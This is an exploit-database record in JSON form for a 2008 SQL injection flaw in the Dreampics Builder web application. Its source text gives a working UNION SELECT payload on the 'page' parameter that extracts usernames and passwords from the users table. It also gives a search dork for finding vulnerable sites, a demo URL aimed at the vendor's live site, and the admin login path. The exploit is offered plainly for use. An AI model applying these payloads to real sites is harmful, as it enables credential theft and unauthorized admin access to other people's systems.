Dreampics Builder (page) Remote SQL Injection Vulnerability

{"type": "zdt", "lastseen": "2016-04-20T00:51:06", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "Dreampics Builder (page) Remote SQL Injection Vulnerability", "published": "2008-07-09T00:00:00", "href": "http://0day.today/exploit/description/3377", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for unknown platform in category web applications", "hash": "721ebccfb101e9865a162d2f22bacc2287b0cf03253229a71454c514bfb9f784", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "===========================================================\r\nDreampics Builder (page) Remote SQL Injection Vulnerability\r\n===========================================================\r\n\r\n\r\n\r\n#########################################################\r\n#\r\n# PICS BUILDER (page) SQL Injection Vulnerability\r\n#========================================================\r\n# Author: Hussin X =\r\n# =\r\n#========================================================= \r\n#\r\n# script : http://www.dreamlevels.com/dreampics.php\r\n#\r\n# DorK : powered by Dreampics Builder\r\n# \r\n##########################################################\r\n\r\nExploit: \r\n\r\nwww.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--\r\n\r\n\r\nL!VE DEMO:\r\n\r\nhttp://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--\r\n\r\n\r\nAdmin Login :\r\n\r\n/admin/\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "id": "1337DAY-ID-3377", "sourceHref": "http://0day.today/exploit/3377", "modified": "2008-07-09T00:00:00", "reporter": "Hussin X", "enchantments": {"vulnersScore": 6.0}}